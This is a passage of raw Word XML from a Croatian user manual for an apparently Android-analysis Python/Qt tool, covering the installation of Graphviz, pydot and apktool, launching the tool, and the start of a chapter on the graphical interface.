      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006C4152" w:rsidRPr="006C4152">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>http://www.graphviz.org/Download.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Na dnu te stranice se klikne na </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Agree</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te se dohvati inačica za željenu platformu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Windows korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici instaliraju program pokretanjem .exe datoteke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Linux korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici izvršavaju redom ove naredbe:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>./configure –with-ortho=yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>make install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">U oba slučaja potrebno je dodati </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>instalacijski_folder/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> pod varijable okruženja kako je to opisano u koraku 2.</w:t>
      </w:r>
      <w:r w:rsidR="006C4152">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc406756483"/>
      <w:bookmarkStart w:id="24" w:name="_Toc406756596"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija alata pydot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Pydot se instalira izvršavanjem sljedećih naredbi (neovisno o OS-u):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pip install –Iv htpps://pypi.python.org/packages/source/p/pyparsing/pyparsing-1.5.7.tar.gz#md5=9be0fcdcc595199c646ab317c1d9a709</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>pip install pydot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="006C4152" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc406756484"/>
      <w:bookmarkStart w:id="26" w:name="_Toc406756597"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija alata apktool</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">apktool se preuzima sa sljedeće stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="006C4152" w:rsidRPr="006C4152">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://code.google.com/p/android-apktool/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Windows korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001963C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows korisnici prvo trebaju dohvatiti skriptu za omatanje sa sljedeće stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="006C4152">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/windows/apktool.bat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006C4152">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">e nakon toga dohvaćaju apktool-2 s već prethodno navedene stranice. Dohvaćeni apktool-2 se preimenuje u apktool (ekstenzija mora biti .jar) te se </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>apktool.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>apktool.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> spremaju u </w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>proizvoljni privremeni direktorij, a nakon dohvaćanja projekta, u direktorij u kojemu se projekt spremio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Linux korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux korisnici prvo dohvaćaju skriptu za omatanje sa sljedeće stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="006C4152">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te nakon toga dohvaćaju apktool-2 kojega se treba preimenovati u apktool (ekstenzija mora biti .jar). Nakon toga se obje datoteke moraju premjestiti u </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>/usr/local/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (potrebna je root dozvola). Treba osigurati da se obje datoteke mogu izvršiti (naredba </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>chmod +x</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="006C4152">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRDefault="006C4152" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc406756485"/>
      <w:bookmarkStart w:id="28" w:name="_Toc406756598"/>
      <w:r>
        <w:t>Pokretanje alata</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00E22904" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Dohvati se projekt sa stranice projekta te se u datoteci pokrene alat </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">startQT </w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">naredbom </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>python startQT.py</w:t>
      </w:r>
      <w:r w:rsidR="00E22904">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Korisnicima Windowsa se prepor</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>učuje</w:t>
      </w:r>
      <w:r w:rsidR="00E22904">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> da prouče poglavlje 5 ovog dokumenta u slučaju nefunkcionalnog rada programa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRDefault="006C4152" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C4152" w:rsidRPr="00012366" w:rsidRDefault="006C4152" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="006C4152" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Napomena.</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Moguće je da će nakon ovih koraka trebati instalira</w:t>
      </w:r>
      <w:r w:rsidR="00B51E23">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ti python lib zavisnosti. Vjeroj</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4152">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>atno će trebati instalirati ipython ( pip install ipython ), numpy ( pip install numpy ) te python-scipy ( pip install git+htpp://github.com/scipy/scipy/ ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00ED13B2" w:rsidP="00ED13B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00ED13B2" w:rsidP="00ED13B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00ED13B2" w:rsidP="00ED13B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="00ED13B2" w:rsidP="00ED13B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED13B2" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc406756486"/>
      <w:bookmarkStart w:id="30" w:name="_Toc406756599"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Grafičko sučelje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Izgled glavnog prozora prikazan je na slici 3.1, a glavni prozor se može podijeliti na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> logičk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> cjelin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Meni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Glavna alatna traka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Glavni prozor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3B23">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Sporedni prozor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="00B35A13" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6079490" cy="4109720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1" name="Slika 1" descr="Izgled glavnog prozora - modifici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gled glavnog prozora - modificiran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9490" cy="4109720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3B90" w:rsidRPr="00CC3B90" w:rsidRDefault="00CC3B90" w:rsidP="00CC3B90">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Slika 3.1. Grafi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>čko sučelje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D529EE" w:rsidRDefault="00D529EE" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D529EE" w:rsidRDefault="00D529EE" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc406756487"/>
      <w:bookmarkStart w:id="32" w:name="_Toc406756600"/>
      <w:r w:rsidRPr="003B3B23">
        <w:lastRenderedPageBreak/>
        <w:t>Meni</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="003B3B23" w:rsidRPr="003B3B23" w:rsidRDefault="003B3B23" w:rsidP="003B3B23">
      <w:pPr>
